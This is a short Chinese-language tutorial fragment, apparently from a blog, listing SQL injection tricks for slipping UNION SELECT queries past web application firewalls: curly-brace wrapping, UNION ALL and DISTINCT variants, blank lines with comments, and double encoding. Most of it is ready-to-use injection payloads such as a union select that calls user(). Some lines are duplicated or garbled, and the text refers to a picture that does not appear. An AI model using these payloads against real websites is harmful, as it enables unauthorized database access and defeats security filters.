花括号
select * from users union select {x 1},{x 2},{x 3},user() //尝试一下花括号里{x user()}
花括号左边是注释
使用 ALL 或者 DISTINCT 绕过
去掉重复值 :
select 1,2 from users where user_id=1 union DISTINCT
select 1,2 select 1,2 from users where user_id=1 union select DISTINCT 1,2
显示全部:
select 1,2 from users where user_id=1 union all select 1,2
select 1,2 from users where user_id=1 union select all
//只是放的为止换了一下
换行绕过,为了绕过waf对联合查询的拦截,可以在联合查询基础上,空几行,配合一些注释符,更可以在这个基础上进行编码。如图
二次编码
若有收获,就点个赞吧
0 人点赞
